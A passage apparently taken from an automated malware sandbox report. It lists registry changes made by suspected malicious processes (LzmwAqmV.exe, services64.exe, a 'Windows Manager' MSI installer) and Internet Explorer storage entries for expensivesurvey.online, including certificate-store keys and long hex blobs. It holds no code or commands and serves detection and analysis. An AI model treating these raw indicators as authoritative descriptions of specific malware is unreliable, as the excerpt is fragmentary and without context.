(int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "9" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "28" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "75" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\de-DE = "de-DE.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338235597" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\NumberOfSubdomains = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "9" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "950" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0233b7502a8d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\ = "122" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca00000000020000000000106600000001000020000000439c26c536a81e7f36d3249036a03464c9910cbebc05b83695fbbffbfa03f28e000000000e8000000002000020000000b59f03a2ba8d8fd6cfacb51c7b92e813a28a6894954373db75159cfdaf7d6d8f90000000d8411fb6c49cb2077701a04c2daaf43cf1d489aa2370aebaf0cc8cc8f90557be856e92bedb76df6ab88bad28d2b00c08b0b3f73cc6ffe8c676daf7c2ab750ca194425d8ac6cc8e2ccca6802dedb4edab901481be10a1993f82b5ea2678e231fbafdf9cf428723b830932c86d5cb723421dd4a547e51f4fc5649a71d9be2d229a63a32983be7d236f681f841e15c86aa740000000990d37efcda40108075f2eb82c1a896c91feeee4bd5ddc0bf40a700b67fda2b26d6d0c279f99895b4466b056989518bf1b0cb53a14305ac1990fed1eb18869c4 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "122" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "122" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
LzmwAqmV.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA LzmwAqmV.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" LzmwAqmV.exe -
Modifies registry class 24 IoCs
Processes:
msiexec.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media msiexec.exe -
Processes:
Sun150faeb3537d.exeinstaller.exeservices64.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sun150faeb3537d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04